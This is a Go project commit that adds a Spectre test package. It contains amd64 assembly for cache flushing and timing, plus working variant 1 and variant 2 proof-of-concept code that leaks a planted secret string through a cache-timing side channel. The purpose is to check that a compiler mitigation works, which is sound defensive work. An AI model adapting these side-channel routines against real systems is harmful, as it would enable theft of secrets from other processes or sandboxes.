author     Russ Cox <rsc@golang.org>  2020-03-11 11:54:56 -0400
committer  Russ Cox <rsc@golang.org>  2020-03-13 19:06:00 +0000
commit     be72e3c3ff21a22bf8162965533672994e670985
tree       f7368c74b8a416270497746f88deee32ac71b2dd /misc
parent     fc8a6336d1ad29acf2c7728ce669df9059169132
misc/spectre: add spectre index test
Test for CL 222660.

Change-Id: I1dae41a9746dfc4144a0d29c02201de8ecd216fd
Reviewed-on: https://go-review.googlesource.com/c/go/+/222978
Reviewed-by: Keith Randall <khr@golang.org>
Diffstat (limited to 'misc')
-rw-r--r--  misc/spectre/asm_amd64.s             51
-rw-r--r--  misc/spectre/doc.go                   7
-rw-r--r--  misc/spectre/index_test.go           59
-rw-r--r--  misc/spectre/spectre_amd64_test.go  282
4 files changed, 399 insertions, 0 deletions
diff --git a/misc/spectre/asm_amd64.s b/misc/spectre/asm_amd64.s
new file mode 100644
index 00000000000..6daa8a7d406
--- /dev/null
+++ b/misc/spectre/asm_amd64.s
@@ -0,0 +1,51 @@
+// Copyright 2020 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+#include "textflag.h"
+
+TEXT ·clflush(SB),NOSPLIT,$0-8
+ MOVQ arg+0(FP), AX
+ CLFLUSH 0(AX)
+ RET
+
+TEXT ·rdtscp(SB),NOSPLIT,$0-8
+ RDTSCP
+ SHLQ $32, DX
+ ORQ DX, AX
+ MOVQ AX, ret+0(FP)
+ RET
+
+TEXT ·nop(SB),NOSPLIT,$0-0
+ RET
+
+TEXT ·cpuid(SB),NOSPLIT,$0-0
+ CPUID
+ RET
+
+TEXT ·features(SB),NOSPLIT,$0-2
+ MOVL $0, AX
+ MOVL $0, CX
+ CPUID
+ CMPL AX, $1
+ JLT none
+
+ MOVL $1, AX
+ MOVL $0, CX
+ CPUID
+ SHRL $19, DX
+ ANDL $1, DX
+ MOVB DX, hasCLFLUSH+0(FP)
+
+ MOVL $0x80000001, AX
+ MOVL $0, CX
+ CPUID
+ SHRL $27, DX
+ ANDL $1, DX
+ MOVB DX, hasRDTSCP+1(FP)
+ RET
+
+none:
+ MOVB $0, hasCLFLUSH+0(FP)
+ MOVB $0, hasRDTSCP+1(FP)
+ RET
diff --git a/misc/spectre/doc.go b/misc/spectre/doc.go
new file mode 100644
index 00000000000..cd068feab78
--- /dev/null
+++ b/misc/spectre/doc.go
@@ -0,0 +1,7 @@
+// Copyright 2020 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+// Package spectre contains a Spectre test.
+// It only runs on certain architectures.
+package spectre
diff --git a/misc/spectre/index_test.go b/misc/spectre/index_test.go
new file mode 100644
index 00000000000..a5ff7306319
--- /dev/null
+++ b/misc/spectre/index_test.go
@@ -0,0 +1,59 @@
+// Copyright 2020 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package spectre
+
+import "testing"
+
+func shouldPanic(f func()) {
+ defer func() {
+ if recover() == nil {
+ panic("index did not panic")
+ }
+ }()
+ f()
+}
+
+var (
+ Zero = 0
+ One = 1
+ Two = 2
+ Three = 3
+ Four = 4
+ Five = 5
+)
+
+func TestIndex(t *testing.T) {
+ xs := "hello"
+ xi := []int{10, 20, 30, 40, 50}
+ xf := []float64{10, 20, 30, 40, 50}
+
+ xs = xs[Zero:Five]
+ xi = xi[Zero:Five]
+ xf = xf[Zero:Five]
+
+ if xs[Four] != 'o' {
+ t.Errorf("xs[4] = %q, want %q", xs[Four], 'o')
+ }
+ if xi[Four] != 50 {
+ t.Errorf("xi[4] = %d, want 50", xi[Four])
+ }
+ if xf[Four] != 50 {
+ t.Errorf("xf[4] = %v, want 50", xf[Four])
+ }
+
+ xs1 := xs[One:]
+ xi1 := xi[One:]
+ xf1 := xf[One:]
+
+ if xs1[Three] != 'o' {
+ t.Errorf("xs1[3] = %q, want %q", xs1[Three], 'o')
+ }
+ if xi1[Three] != 50 {
+ t.Errorf("xi1[3] = %d, want 50", xi1[Three])
+ }
+ if xf1[Three] != 50 {
+ t.Errorf("xf1[3] = %v, want 50", xf1[Three])
+ }
+}
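index_test.go defines a shouldPanic helper, but the hunks above only exercise in-range accesses. A hedged sketch of how the same non-constant index variables could be used to check that out-of-range accesses still panic (the test name and cases here are hypothetical, not part of the CL):

	func TestIndexPanics(t *testing.T) {
		xi := []int{10, 20, 30, 40, 50}
		shouldPanic(func() { _ = xi[Five] })    // one past the end must still panic
		shouldPanic(func() { _ = xi[Two:One] }) // inverted slice bounds must still panic
	}

Presumably the point is that behavior is unchanged when the compiler's Spectre index-masking mode from CL 222660 is enabled, e.g. via go test -gcflags=all=-spectre=index (an assumption about the companion CL; the flag does not appear in this diff).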
diff --git a/misc/spectre/spectre_amd64_test.go b/misc/spectre/spectre_amd64_test.go
new file mode 100644
index 00000000000..7970d3c5cb6
--- /dev/null
+++ b/misc/spectre/spectre_amd64_test.go
@@ -0,0 +1,282 @@
+// Copyright 2020 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+package spectre
+
+import (
+ "flag"
+ "sort"
+ "sync/atomic"
+ "testing"
+ "unsafe"
+)
+
+// asm_amd64.s
+func nop()
+func cpuid()
+func clflush(unsafe.Pointer)
+func rdtscp() int64
+func features() (hasCLFLUSH, hasRDTSCP bool)
+
+// Victim program
+
+type victimStruct struct {
+ secret []byte
+ pad1 [4]int
+ slice1 []byte // starts on word 7 of struct, so len is in word 8, new cache line
+ pad2 [6 + 7]int // cache-line aligned again
+ slice2 []int
+ pad2b [6]int // cache-line aligned again
+ timingArray [256]struct {
+ pad [1024 - 4]byte
+ data int32
+ }
+ pad3 [1024 - 4]byte
+ temp int32
+ pad5 [1024]byte
+ slice2data [8]int
+ f uintptr
+}
+
+var v *victimStruct
+
+func init() {
+ // Allocate dynamically to force 64-byte alignment.
+ // A global symbol would only be 32-byte aligned.
+ v = new(victimStruct)
+ if uintptr(unsafe.Pointer(v))&63 != 0 {
+ panic("allocation not 64-byte aligned")
+ }
+ v.secret = []byte("The Magic Words are Squeamish Gossifrage")
+ v.slice1 = []byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16}
+ v.slice2 = v.slice2data[:]
+ f := nop
+ v.f = *(*uintptr)(unsafe.Pointer(&f))
+}
+
+// Spectre variant 1. (BCB - Bounds Check Bypass)
+// Speculation fetches from v.timingArray even if i is out of bounds in v.slice1[i].
+
+func victim1(i int) {
+ if uint(i) < uint(len(v.slice1)) {
+ v.temp ^= v.timingArray[v.slice1[i]].data
+ }
+}
+
+func spectre1(innocent, target int) {
+ for j := 31; j >= 0; j-- {
+ // Flush the cache line holding the slice len (but not the base pointer).
+ // This makes the test in victim1 need to fetch from main memory,
+ // increasing the window during which the CPU speculates ahead.
+ // The CPUID waits for the CLFLUSH to finish.
+ clflush(unsafe.Pointer(uintptr(unsafe.Pointer(&v.slice1)) + 8))
+ cpuid()
+ mask := (j - 1) >> 8 // 0 on most rounds, -1 on last
+ victim1(innocent&^mask | target&mask)
+ }
+}
+
+// Spectre variant 1 again, with implicit bounds check provided by Go.
+// Speculation fetches from v.timingArray even if i is out of bounds in v.slice1[i].
+
+func victim1Implicit(i int) {
+ defer func() {
+ recover()
+ }()
+ v.temp ^= v.timingArray[v.slice1[i]].data
+}
+
+func spectre1Implicit(innocent, target int) {
+ // Same as spectre1 above, calling victim1Implicit.
+ for j := 31; j >= 0; j-- {
+ clflush(unsafe.Pointer(uintptr(unsafe.Pointer(&v.slice1)) + 8))
+ cpuid()
+ mask := (j - 1) >> 8 // 0 on most rounds, -1 on last
+ victim1Implicit(innocent&^mask | target&mask)
+ }
+}
+
+// Spectre variant 2 victim gadget. (BTI - Branch Target Injection)
+// Will speculate that final call is to victimType.Victim instead of attackerType.Victim.
+
+type victimType int
+
+func (i victimType) Victim() {
+ victim1(int(i))
+}
+
+type attackerType int
+
+func (attackerType) Victim() {}
+
+func spectre2(innocent, target int) {
+ list := make([]interface{ Victim() }, 128)
+ list[0] = victimType(innocent)
+ vi := list[0]
+ for i := range list {
+ list[i] = vi
+ }
+ list[len(list)-1] = attackerType(target)
+
+ av := &list[len(list)-1]
+ // The 24 here is the offset of the first method in the itab.
+ itab := unsafe.Pointer(uintptr(**(**unsafe.Pointer)(unsafe.Pointer(&av))) + 24)
+
+ for _, vi := range list {
+ clflush(itab)
+ clflush(unsafe.Pointer(uintptr(unsafe.Pointer(&v.slice1)) + 8))
+ cpuid()
+ vi.Victim()
+ }
+}
+
+// General attack.
+
+func readbyte(target int, spectre func(int, int)) byte {
+ for tries := 0; tries < 10; tries++ {
+ var times [256][8]int
+ for round := range times[0] {
+ // Flush timingArray.
+ for j := range times {
+ clflush(unsafe.Pointer(&v.timingArray[j].data))
+ }
+
+ // Speculate load from timingArray.
+ innocent := round % 16
+ spectre(innocent, target)
+
+ // Measure access times for v.timingArray.
+ // The atomic.LoadInt32 is not for synchronization
+ // but instead something that the compiler won't optimize away or move.
+ for j := range times {
+ pj := (j*167 + 234) & 255 // permuted j to confuse prefetch
+ atomic.LoadInt32(&dummy[0])
+ addr := &v.timingArray[byte(pj)].data
+ t := rdtscp()
+ dummy[0] += int32(*addr)
+ t = rdtscp() - t
+ times[pj][round] = int(t)
+ }
+ }
+
+ found := 0
+ var c byte
+ for j := range times {
+ _, avg, _ := stats(times[j][:])
+ if hitMin/2 <= avg && avg <= 2*hitMax {
+ found++
+ c = byte(j)
+ }
+ }
+ if found == 1 {
+ return c
+ }
+ if found > 10 {
+ return 0
+ }
+ }
+ return 0
+}
+
+var leakFixed = flag.Bool("leakfixed", false, "expect leak to be fixed")
+
+func testSpectre(t *testing.T, spectre func(int, int)) {
+ if hasCLFLUSH, hasRDTSCP := features(); !hasCLFLUSH {
+ t.Skip("CLFLUSH not available")
+ } else if !hasRDTSCP {
+ t.Skip("RDTSCP not available")
+ }
+
+ t.Logf("hit %d %d %d vs miss %d %d %d\n", hitMin, hitAvg, hitMax, missMin, missAvg, missMax)
+ if missMin/2 < hitMax {
+ t.Fatalf("cache misses vs cache hits too close to call")
+ return
+ }
+
+ offset := int(uintptr(unsafe.Pointer(&v.secret[0])) - uintptr(unsafe.Pointer(&v.slice1[0])))
+ // fmt.Printf("offset %d\n", offset)
+ buf := make([]byte, 40)
+ for i := 0; i < 40; i++ {
+ buf[i] = readbyte(offset+i, spectre)
+ }
+ found := string(buf)
+
+ // Don't insist on the whole string, but expect most of it.
+ leaked := 0
+ for i := range found {
+ if found[i] == v.secret[i] {
+ leaked++
+ }
+ }
+ if !*leakFixed && leaked < len(found)/2 {
+ t.Fatalf("expected leak; found only %q", found)
+ }
+ if *leakFixed && leaked > 0 {
+ t.Fatalf("expected no leak; found %q", found)
+ }
+}
+
+func TestSpectre1(t *testing.T) {
+ testSpectre(t, spectre1)
+}
+
+func TestSpectre1Implicit(t *testing.T) {
+ testSpectre(t, spectre1Implicit)
+}
+
+func TestSpectre2(t *testing.T) {
+ testSpectre(t, spectre2)
+}
+
+var (
+ hitMin, hitAvg, hitMax = measure(-1, 500)
+ missMin, missAvg, missMax = measure(500, 500)
+)
+
+var dummy [1024]int32
+
+func measure(flush, probe int) (min, avg, max int) {
+ var times [100]int
+ for i := range times {
+ if flush >= 0 {
+ clflush(unsafe.Pointer(&dummy[flush]))
+ }
+ // The atomic.LoadInt32 is not for synchronization
+ // but instead something that the compiler won't optimize away or move.
+ t := rdtscp()
+ dummy[0] += atomic.LoadInt32(&dummy[probe])
+ times[i] = int(rdtscp() - t)
+ }
+ return stats(times[:])
+}
+
+func stats(x []int) (min, avg, max int) {
+ // Discard outliers.
+ sort.Ints(x)
+ q1 := x[len(x)/4]
+ q3 := x[len(x)*3/4]
+ lo := q1 - (q3-q1)*3/2
+ hi := q3 + (q3-q1)*3/2
+ i := 0
+ for i < len(x) && x[i] < lo {
+ i++
+ }
+ j := len(x)
+ for j-1 > i && x[j-1] > hi {
+ j--
+ }
+ if i < j {
+ x = x[i:j]
+ }
+
+ min = x[0]
+ max = x[len(x)-1]
+
+ avg = 0
+ for _, v := range x {
+ avg += v
+ }
+ avg /= len(x)
+ return min, avg, max
+}
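The constant 24 in spectre2 is the byte offset of the first method pointer inside the runtime's itab on 64-bit targets. A sketch of that layout (mirroring runtime internals of this era; an illustration, not part of the CL):

	// Mirror of runtime.itab on amd64: fun[0], the first method pointer, is at offset 24.
	type itabLayout struct {
		inter uintptr    // *interfacetype  offset 0
		typ   uintptr    // *_type          offset 8
		hash  uint32     //                 offset 16
		_     [4]byte    // padding         offset 20
		fun   [1]uintptr // method table    offset 24
	}

Flushing that slot before vi.Victim() makes the CPU stall while resolving the real call target, so it speculates into the previously trained victimType.Victim, just as flushing the slice length widens the speculation window in spectre1.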